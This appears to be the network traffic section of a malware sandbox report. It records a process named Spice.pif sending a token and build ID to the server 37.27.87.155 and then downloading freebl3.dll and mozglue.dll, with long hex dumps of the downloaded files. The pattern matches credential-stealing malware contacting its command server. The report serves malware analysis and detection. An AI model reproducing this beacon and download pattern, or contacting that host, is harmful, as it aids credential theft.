                                                                                                                                                                                                                                    2024-04-30 05:44:11 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 32 66 62 37 36 65 33 37 36 61 65 31 64 37 64 65 30 35 38 30 31 61 33 65 64 35 36 62 35 62 64 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 36 62 62 35 34 61 66 62 33 63 37 66 31 35 64 38 38 61 38 36 66 61 38 36 36 37 65 38 31 66 39 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 45 43 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                    Data Ascii: ------KEGDAKEHJDHIDHJJDAECContent-Disposition: form-data; name="token"52fb76e376ae1d7de05801a3ed56b5bd------KEGDAKEHJDHIDHJJDAECContent-Disposition: form-data; name="build_id"86bb54afb3c7f15d88a86fa8667e81f9------KEGDAKEHJDHIDHJJDAECCont
                                                                                                                                                                                                                                    2024-04-30 05:44:12 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Date: Tue, 30 Apr 2024 05:44:12 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    2024-04-30 05:44:12 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    10192.168.2.84971937.27.87.155443752C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2024-04-30 05:44:13 UTC156OUTGET /freebl3.dll HTTP/1.1
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                    Host: 37.27.87.155
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    2024-04-30 05:44:14 UTC246INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Date: Tue, 30 Apr 2024 05:44:13 GMT
                                                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                                                    Content-Length: 685392
                                                                                                                                                                                                                                    Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    ETag: "6315a9f4-a7550"
                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                    2024-04-30 05:44:14 UTC16138INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00
                                                                                                                                                                                                                                    Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHS
                                                                                                                                                                                                                                    2024-04-30 05:44:14 UTC16384INData Raw: 89 7d c8 89 f2 31 fa 8b 4d 98 31 c1 89 ce 0f a4 d6 10 89 b5 58 ff ff ff 0f ac d1 10 89 4d 98 8b 7d ec 01 cf 89 7d ec 8b 55 e0 11 f2 89 55 e0 31 d3 8b 4d 8c 31 f9 89 da 0f a4 ca 01 89 55 88 0f a4 d9 01 89 4d 8c 8b 5d d4 03 9d 20 ff ff ff 8b 45 cc 13 85 48 ff ff ff 03 5d 94 13 45 9c 89 45 cc 8b bd 7c ff ff ff 31 c7 8b 45 a8 31 d8 89 45 a8 8b 4d c4 01 f9 89 4d c4 8b 75 bc 11 c6 89 75 bc 8b 55 94 31 ca 8b 4d 9c 31 f1 89 d0 0f a4 c8 08 0f a4 d1 08 89 4d 9c 03 9d 04 ff ff ff 8b 75 cc 13 b5 08 ff ff ff 01 cb 89 5d d4 11 c6 89 75 cc 8b 4d a8 31 f1 31 df 89 fa 0f a4 ca 10 89 55 94 0f ac cf 10 89 bd 7c ff ff ff 8b 75 c4 01 fe 89 75 c4 8b 4d bc 11 d1 89 4d bc 31 c8 8b 5d 9c 31 f3 89 c1 0f a4 d9 01 89 8d 78 ff ff ff 0f a4 c3 01 89 5d 9c 8b 45 b8 03 85 30 ff ff ff 8b
                                                                                                                                                                                                                                    Data Ascii: }1M1XM}}UU1M1UM] EH]EE|1E1EMMuuU1M1Mu]uM11U|uuMM1]1x]E0
                                                                                                                                                                                                                                    2024-04-30 05:44:14 UTC16384INData Raw: 00 89 90 98 00 00 00 8b 4d e8 89 fa 31 ca c1 c2 08 31 d1 89 d6 89 88 a4 00 00 00 8b 4d d8 8b 55 d4 31 ca c1 c2 08 89 b0 a0 00 00 00 31 d1 89 88 ac 00 00 00 89 90 a8 00 00 00 8b 4d c0 8b 55 c4 31 d1 c1 c1 08 31 ca 89 90 b4 00 00 00 8b 95 54 ff ff ff 8b 75 bc 31 d6 c1 c6 08 89 88 b0 00 00 00 31 f2 89 90 bc 00 00 00 89 b0 b8 00 00 00 81 c4 d8 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 00 01 00 00 89 95 78 ff ff ff 89 cf ff 31 e8 a2 90 07 00 83 c4 04 89 45 bc ff 77 04 e8 94 90 07 00 83 c4 04 89 45 b8 ff 77 08 e8 86 90 07 00 83 c4 04 89 45 c0 ff 77 0c e8 78 90 07 00 83 c4 04 89 45 dc ff 77 10 e8 6a 90 07 00 83 c4 04 89 c6 ff 77 14 e8 5d 90 07 00 83 c4 04 89 c3 ff 77 18 e8 50 90 07 00 83 c4 04 89 45 e8 ff 77 1c e8 42 90
                                                                                                                                                                                                                                    Data Ascii: M11MU11MU11Tu11^_[]USWVx1EwEwEwxEwjw]wPEwB
                                                                                                                                                                                                                                    2024-04-30 05:44:14 UTC16384INData Raw: 01 00 00 30 43 01 8a 87 1a 01 00 00 30 43 02 8a 87 1b 01 00 00 30 43 03 8a 87 1c 01 00 00 30 43 04 8a 87 1d 01 00 00 30 43 05 8a 87 1e 01 00 00 30 43 06 8a 87 1f 01 00 00 30 43 07 8a 87 20 01 00 00 30 43 08 8a 87 21 01 00 00 30 43 09 8a 87 22 01 00 00 30 43 0a 8a 87 23 01 00 00 30 43 0b 8a 87 24 01 00 00 30 43 0c 8a 87 25 01 00 00 30 43 0d 8a 87 26 01 00 00 30 43 0e 8a 87 27 01 00 00 30 43 0f 0f 10 45 e0 0f 11 87 18 01 00 00 8b 4d f0 31 e9 e8 ad 4e 07 00 31 c0 83 c4 1c 5e 5f 5b 5d c3 cc cc cc 55 89 e5 68 28 01 00 00 e8 42 50 07 00 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 24 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 85 c9 74 50 8b 45 10 8d 50 f0 83 fa 10 77 45 be 01 01 01 00 0f a3 d6 73 3b 8b 75 18 83 fe 02 73 33 8b 7d
                                                                                                                                                                                                                                    Data Ascii: 0C0C0C0C0C0C0C 0C!0C"0C#0C$0C%0C&0C'0CEM1N1^_[]Uh(BP]USWV$M01EtPEPwEs;us3}
                                                                                                                                                                                                                                    2024-04-30 05:44:14 UTC16384INData Raw: 89 5e 1c c1 e8 18 33 0c 85 70 3f 08 10 89 56 20 8b 45 f0 8b 5d ec 29 d8 05 33 37 ef c6 0f b6 d4 8b 14 95 70 37 08 10 0f b6 f0 33 14 b5 70 33 08 10 89 c6 c1 ee 0e 81 e6 fc 03 00 00 33 96 70 3b 08 10 8b 75 e0 89 7e 24 c1 e8 18 33 14 85 70 3f 08 10 89 4e 28 89 56 2c 8b 45 e8 89 c7 0f a4 df 08 0f a4 c3 08 89 5d ec 8b 45 e4 01 f8 05 99 91 21 72 0f b6 cc 8b 0c 8d 70 37 08 10 0f b6 d0 33 0c 95 70 33 08 10 89 c2 c1 ea 0e 81 e2 fc 03 00 00 33 8a 70 3b 08 10 c1 e8 18 33 0c 85 70 3f 08 10 89 4e 30 8b 75 f0 89 f1 29 d9 81 c1 67 6e de 8d 0f b6 c5 8b 04 85 70 37 08 10 0f b6 d1 33 04 95 70 33 08 10 89 ca c1 ea 0e 81 e2 fc 03 00 00 33 82 70 3b 08 10 c1 e9 18 33 04 8d 70 3f 08 10 89 f1 8b 55 e4 0f a4 d6 18 89 75 e8 0f ac d1 08 89 cb 89 4d f0 8d 14 3e 81 c2 31 23 43 e4 0f
                                                                                                                                                                                                                                    Data Ascii: ^3p?V E])37p73p33p;u~$3p?N(V,E]E!rp73p33p;3p?N0u)gnp73p33p;3p?UuM>1#C
                                                                                                                                                                                                                                    2024-04-30 05:44:14 UTC16384INData Raw: 04 00 83 c4 04 85 c0 89 7d a8 0f 88 d4 01 00 00 8d 45 d0 50 e8 ed 59 04 00 83 c4 04 85 c0 0f 88 c0 01 00 00 8d 45 c0 50 e8 d9 59 04 00 83 c4 04 85 c0 0f 88 ac 01 00 00 8d 45 b0 50 e8 c5 59 04 00 83 c4 04 89 c3 85 c0 0f 88 98 01 00 00 8d 46 04 8b 4d ac 83 c1 04 50 51 57 e8 ae d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 7c 01 00 00 8b 45 ac ff 70 0c ff 70 08 8d 45 c0 50 e8 48 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 5b 01 00 00 8d 46 10 8b 4d ac 83 c1 10 50 51 ff 75 a8 e8 6f d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 3d 01 00 00 8b 45 ac ff 70 18 ff 70 14 8d 45 e0 50 e8 09 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 1c 01 00 00 8b 4e 0c b8 40 00 00 00 81 f9 7f 07 00 00 77 2c b8 30 00 00 00 81 f9 bf 03 00 00 77 1f b8 20 00 00 00 81 f9 7f 01 00 00 77 12 31 c0 81 f9 00 01 00 00 0f 93 c0
                                                                                                                                                                                                                                    Data Ascii: }EPYEPYEPYFMPQW|EppEPH[FMPQuo=EppEPN@w,0w w1
                                                                                                                                                                                                                                    2024-04-30 05:44:14 UTC16384INData Raw: 24 60 50 e8 4e 1c 04 00 83 c4 04 8d 44 24 50 50 e8 41 1c 04 00 83 c4 04 8d 44 24 40 50 e8 34 1c 04 00 83 c4 04 8d 44 24 30 50 e8 27 1c 04 00 83 c4 04 8d 44 24 20 50 e8 1a 1c 04 00 83 c4 04 83 c6 04 83 fe 04 77 1a b8 13 e0 ff ff ff 24 b5 74 55 08 10 b8 05 e0 ff ff eb 0c b8 02 e0 ff ff eb 05 b8 01 e0 ff ff 50 e8 7d 90 06 00 83 c4 04 e9 75 fb ff ff cc cc 55 89 e5 53 57 56 81 ec ac 00 00 00 89 cb 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 73 08 83 c6 07 c1 ee 03 85 c9 74 1b 8b 41 04 80 38 04 0f 85 c2 01 00 00 8d 04 36 83 c0 01 39 41 08 0f 85 b3 01 00 00 89 95 48 ff ff ff c7 45 ec 00 00 00 00 c7 45 dc 00 00 00 00 c7 45 cc 00 00 00 00 c7 45 bc 00 00 00 00 c7 45 ac 00 00 00 00 c7 45 9c 00 00 00 00 c7 45 8c 00 00 00 00 c7 85 7c ff ff ff 00 00 00 00 c7 85 6c ff ff
                                                                                                                                                                                                                                    Data Ascii: $`PND$PPAD$@P4D$0P'D$ Pw$tUP}uUSWVM01EstA869AHEEEEEEE|l
                                                                                                                                                                                                                                    2024-04-30 05:44:14 UTC16384INData Raw: 89 f8 f7 65 c4 89 95 4c fd ff ff 89 85 58 fd ff ff 89 f8 f7 65 d4 89 95 ac fd ff ff 89 85 b4 fd ff ff 89 f8 f7 65 d8 89 95 30 fe ff ff 89 85 40 fe ff ff 89 f8 f7 65 e4 89 95 a0 fe ff ff 89 85 a4 fe ff ff 89 f8 f7 65 e0 89 95 c4 fe ff ff 89 85 cc fe ff ff 89 f8 f7 65 dc 89 95 ec fe ff ff 89 85 f0 fe ff ff 89 d8 f7 e7 89 95 10 ff ff ff 89 85 18 ff ff ff 8b 75 94 89 f0 f7 65 9c 89 85 30 fd ff ff 89 55 88 8b 45 c8 8d 14 00 89 f0 f7 e2 89 95 90 fd ff ff 89 85 98 fd ff ff 89 f0 f7 65 c4 89 95 f0 fd ff ff 89 85 f8 fd ff ff 89 f0 f7 65 90 89 55 90 89 85 9c fe ff ff 89 f0 f7 65 d8 89 95 b8 fe ff ff 89 85 bc fe ff ff 89 f0 f7 65 ec 89 95 e4 fe ff ff 89 85 e8 fe ff ff 89 f0 f7 65 e0 89 95 20 ff ff ff 89 85 24 ff ff ff 89 f0 f7 65 f0 89 95 28 ff ff ff 89 85 30 ff ff
                                                                                                                                                                                                                                    Data Ascii: eLXee0@eeeue0UEeeUeee $e(0
                                                                                                                                                                                                                                    2024-04-30 05:44:14 UTC16384INData Raw: 89 4d bc 8b 4f 28 89 4d a8 89 75 c8 89 45 d8 8b 47 24 89 45 c0 8b 77 20 89 75 ac 8b 4f 08 89 4d e0 89 f8 89 7d ec 8b 5d a8 01 d9 8b 3f 01 f7 89 7d cc 8b 70 04 13 75 c0 89 75 b8 83 d1 00 89 4d d0 0f 92 45 b4 8b 70 0c 8b 55 bc 01 d6 8b 48 10 8b 45 d4 11 c1 0f 92 45 90 01 d6 11 c1 0f 92 45 e8 01 c6 89 45 d4 13 4d e4 0f 92 45 f0 01 5d e0 0f b6 7d b4 8d 04 06 11 c7 0f 92 45 b4 8b 45 c0 01 45 cc 11 5d b8 8b 45 bc 8b 55 d0 8d 1c 02 83 d3 00 89 5d e0 0f 92 c3 01 c2 0f b6 db 8b 45 e4 8d 14 07 11 d3 89 5d d0 0f 92 c2 03 75 d4 0f b6 45 b4 8b 5d e4 8d 34 19 11 f0 89 45 9c 0f 92 45 a4 01 df 0f b6 d2 8b 75 c8 8d 34 30 11 f2 0f 92 45 df 80 45 90 ff 8b 75 ec 8b 46 14 89 45 94 8d 04 03 89 df 83 d0 00 89 45 b4 0f 92 45 98 80 45 e8 ff 8d 1c 18 89 7d e4 83 d3 00 0f 92 45 8c
                                                                                                                                                                                                                                    Data Ascii: MO(MuEG$Ew uOM}]?}puuMEpUHEEEEME]}EEE]EU]E]uE]4EEu40EEuFEEEE}E
                                                                                                                                                                                                                                    2024-04-30 05:44:14 UTC16384INData Raw: ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff ff ff 8b b5 08 ff ff ff 81 e6 ff ff ff 1f 89 ca 81 e2 ff ff ff 1f 01 d6 89 b5 28 ff ff ff 8b b5 04 ff ff ff 81 e6 ff ff
                                                                                                                                                                                                                                    Data Ascii: 0<48%8A)$(


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    11192.168.2.84972037.27.87.155443752C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2024-04-30 05:44:15 UTC156OUTGET /mozglue.dll HTTP/1.1
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                    Host: 37.27.87.155
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    2024-04-30 05:44:16 UTC246INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Date: Tue, 30 Apr 2024 05:44:16 GMT
                                                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                                                    Content-Length: 608080
                                                                                                                                                                                                                                    Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    ETag: "6315a9f4-94750"
                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                    2024-04-30 05:44:16 UTC16138INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00
                                                                                                                                                                                                                                    Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W,
                                                                                                                                                                                                                                    2024-04-30 05:44:16 UTC16384INData Raw: ff ff 8d 41 24 50 e8 fb 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 62 ff ff ff 8d 41 24 50 e8 df 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc eb 92 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 56 8b 75 0c 8b 8e b0 00 00 00 83 f9 10 0f 83 e4 00 00 00 c7 86 ac 00 00 00 00 00 00 00 c7 86 b0 00 00 00 0f 00 00 00 c6 86 9c 00 00 00 00 8b 8e 98 00 00 00 83 f9 10 0f 83 e0 00 00 00 c7 86 94 00 00 00 00 00 00 00 c7 86 98 00 00 00 0f 00 00 00 c6 86 84 00 00 00 00 8b 8e 80 00 00 00 83 f9 10 0f 83 dc 00 00 00 c7 46 7c 00 00 00 00 c7 86 80 00 00 00 0f 00 00 00 c6 46 6c 00 8b 4e 68 83 f9 10 0f 83 de 00 00 00 c7 46 64 00 00 00 00 c7 46 68 0f 00 00 00 c6 46 54 00 8b 4e 50 83 f9 10 0f 83 e3 00 00 00 c7 46 4c 00 00 00 00 c7 46 50 0f 00 00 00 c6 46
                                                                                                                                                                                                                                    Data Ascii: A$P~#HbA$P~#HUVuF|FlNhFdFhFTNPFLFPF
                                                                                                                                                                                                                                    2024-04-30 05:44:16 UTC16384INData Raw: 0f 86 bd 05 00 00 50 e8 7a d3 01 00 83 c4 04 e9 e1 f9 ff ff 8b 45 90 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 b4 05 00 00 50 e8 57 d3 01 00 83 c4 04 e9 dc f9 ff ff 8b 85 78 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 a8 05 00 00 50 e8 31 d3 01 00 83 c4 04 e9 d4 f9 ff ff 8b 85 60 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 9c 05 00 00 50 e8 0b d3 01 00 83 c4 04 e9 d2 f9 ff ff 8b 85 48 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 90 05 00 00 50 e8 e5 d2 01 00 83 c4 04 e9 d6 f9 ff ff 8b b5 24 ff ff ff 89 0e 8b 85 2c ff ff ff 89 46 04 8b 4d f0 31 e9 e8 52 27 03 00 89 f0 81 c4 d0 00 00 00 5e 5f 5b 5d c3 89 f1 89 fa ff b5 30 ff ff ff e9 30 f4 ff ff 89 f1 81 c6 4c ff ff ff 39 c8 74 63 8d 8d 3c ff ff ff 56 e8 de bc ff ff 89 f1 89 fa e8 d5 f1
                                                                                                                                                                                                                                    Data Ascii: PzEPWxP1`PHP$,FM1R'^_[]00L9tc<V
                                                                                                                                                                                                                                    2024-04-30 05:44:16 UTC16384INData Raw: 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 03 b9 59 17 b7 d1 89 f8 f7 e1 89 d1 c1 e9 0d 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 02 89 f8 c1 e8 05 b9 c5 5a 7c 0a f7 e1 89 d1 c1 e9 07 bb ff 00 00 00 89 c8 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c1 80 c9 30 ba 83 de 1b 43 89 f8 f7 e2 8b 06 8b 7d 08 88 4c 38 01 c1 ea 12 89 d0 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c2 80 ca 30 89 f1 8b 06 8b 75 08 88 14 06 8b 39 8d 47 07 89 01 83 c7 0d b9 cd cc cc cc 8b 75 ec 89 f0 f7 e1 89 d1 c1 e9 03 8d 04 09 8d 04 80 89 f3 29 c3 80 cb 30 89 c8 ba cd cc cc cc f7 e2 8b 45 08 88 1c 38 89 c3 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 7d 0c 8b 07 88 4c 18 05 b9 1f 85 eb 51 89 f0 f7 e1 89 d1 c1 e9 05 89 c8 ba
                                                                                                                                                                                                                                    Data Ascii: )0LY)0LZ|!i(0C}L8!i(0u9Gu)0E8)0}LQ
                                                                                                                                                                                                                                    2024-04-30 05:44:16 UTC16384INData Raw: 00 00 00 31 c9 8d 14 08 83 c2 0c f2 0f 10 42 f4 8b 5d f0 f2 0f 11 04 0b 8b 7a fc c7 42 fc 00 00 00 00 89 7c 0b 08 8b 1e 8b 7e 04 8d 3c 7f 8d 3c bb 83 c1 0c 39 fa 72 cd e9 81 00 00 00 8b 06 8d 0c 49 8d 0c 88 89 4d f0 31 d2 8d 1c 10 83 c3 0c f2 0f 10 43 f4 f2 0f 11 04 17 8b 4b fc c7 43 fc 00 00 00 00 89 4c 17 08 83 c2 0c 3b 5d f0 72 da 8b 46 04 85 c0 0f 8e 02 ff ff ff 8b 1e 8d 04 40 8d 04 83 89 45 f0 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 ec 52 01 00 83 c4 04 83 c3 0c 3b 5d f0 0f 83 d4 fe ff ff eb db 31 c0 40 89 45 ec e9 27 ff ff ff 8d 0c 49 8d 3c 88 89 c3 39 fb 73 20 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 b0 52 01 00 83 c4 04 83 c3 0c 39 fb 72 e2 8b 1e 53 e8 9e 52 01 00 83 c4 04 8b 45 f0 89 06 8b 45 ec 89 46 08 e9 8b fe ff ff 68 a7 fa 07
                                                                                                                                                                                                                                    Data Ascii: 1B]zB|~<<9rIM1CKCL;]rF@ECCtPR;]1@E'I<9s CCtPR9rSREEFh
                                                                                                                                                                                                                                    2024-04-30 05:44:16 UTC16384INData Raw: 1b 89 c8 e9 b3 fe ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 07 89 c8 e9 c2 fe ff ff ff 15 b0 bf 08 10 cc cc cc cc 55 89 e5 57 56 89 ce 8b 79 20 85 ff 74 28 f0 ff 4f 38 75 22 8b 4f 14 83 f9 10 73 5f c7 47 10 00 00 00 00 c7 47 14 0f 00 00 00 c6 07 00 57 e8 2d 13 01 00 83 c4 04 8b 7e 18 c7 46 18 00 00 00 00 85 ff 74 1c 8b 07 85 c0 74 0d 50 ff 15 04 be 08 10 c7 07 00 00 00 00 57 e8 03 13 01 00 83 c4 04 8b 46 08 85 c0 75 2f 8b 46 04 85 c0 74 09 50 e8 ec 12 01 00 83 c4 04 5e 5f 5d c3 8b 07 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 76 20 50 e8 cf 12 01 00 83 c4 04 eb 86 c7 05 f4 f8 08 10 1a 2b 08 10 cc b9 18 00 00 00 e8 0d 80 02 00 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 04 89 c8 eb cf ff 15 b0 bf 08 10 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 e4 f8
                                                                                                                                                                                                                                    Data Ascii: H) sUWVy t(O8u"Os_GGW-~FttPWFu/FtP^_]v P+H) sUSWV
                                                                                                                                                                                                                                    2024-04-30 05:44:16 UTC16384INData Raw: 00 00 c7 44 24 34 07 00 00 00 66 c7 44 24 20 00 00 57 e8 e1 37 06 00 83 c4 04 89 c6 83 f8 07 8b 5c 24 04 0f 87 4b 03 00 00 8d 44 24 20 89 70 10 89 f1 01 f1 51 57 50 e8 fe 37 06 00 83 c4 0c 66 c7 44 74 20 00 00 8b 44 24 30 8b 4c 24 34 89 ca 29 c2 83 fa 11 0f 82 fd 05 00 00 8d 50 11 89 54 24 30 83 f9 08 72 06 8b 4c 24 20 eb 04 8d 4c 24 20 0f b7 15 de 4d 08 10 66 89 54 41 20 0f 10 05 ce 4d 08 10 0f 11 44 41 10 0f 10 05 be 4d 08 10 0f 11 04 41 66 c7 44 41 22 00 00 bf 10 00 00 00 57 e8 60 3e 00 00 83 c4 04 89 c6 8b 45 0c f2 0f 10 40 20 f2 0f 11 06 f2 0f 10 40 28 f2 0f 11 46 08 83 7c 24 34 08 72 06 8b 44 24 20 eb 04 8d 44 24 20 57 56 6a 03 6a 00 50 53 ff 15 2c e3 08 10 89 c3 56 e8 9e d2 00 00 83 c4 04 8b 4c 24 34 83 f9 08 8b 7c 24 08 0f 83 b0 03 00 00 85 db 0f
                                                                                                                                                                                                                                    Data Ascii: D$4fD$ W7\$KD$ pQWP7fDt D$0L$4)PT$0rL$ L$ MfTA MDAMAfDA"W`>E@ @(F|$4rD$ D$ WVjjPS,VL$4|$
                                                                                                                                                                                                                                    2024-04-30 05:44:17 UTC16384INData Raw: 08 0f 86 cc 02 00 00 83 c3 0f 89 d8 83 e0 f0 89 44 24 1c c1 eb 04 c1 e3 05 8d 34 1f 83 c6 50 80 7f 3c 00 89 7c 24 10 89 5c 24 18 74 0a 83 7f 40 00 0f 84 29 06 00 00 8d 47 0c 89 44 24 20 50 ff 15 30 be 08 10 8b 16 85 d2 0f 84 38 01 00 00 83 7a 08 00 0f 84 2e 01 00 00 8b 4a 04 8b 74 8a 0c 85 f6 0f 84 eb 01 00 00 8b 5f 40 85 db 75 60 0f bc fe 89 cb c1 e3 05 09 fb 0f bb fe 8b 7c 24 10 8b 44 24 18 0f af 5c 07 58 8b 44 07 68 89 74 8a 0c 01 d0 01 c3 83 42 08 ff 85 db 0f 84 a2 05 00 00 8b 44 24 1c 01 47 2c ff 74 24 20 ff 15 b0 be 08 10 85 db 0f 84 93 05 00 00 8b 4c 24 60 31 e9 e8 51 e7 01 00 89 d8 8d 65 f4 5e 5f 5b 5d c3 89 4c 24 04 89 54 24 14 8b 0b 8b 7b 04 89 3c 24 0f a4 cf 17 89 c8 c1 e0 17 31 c8 8b 53 0c 33 3c 24 89 7c 24 08 8b 4b 08 89 0c 24 89 53 04 0f a4
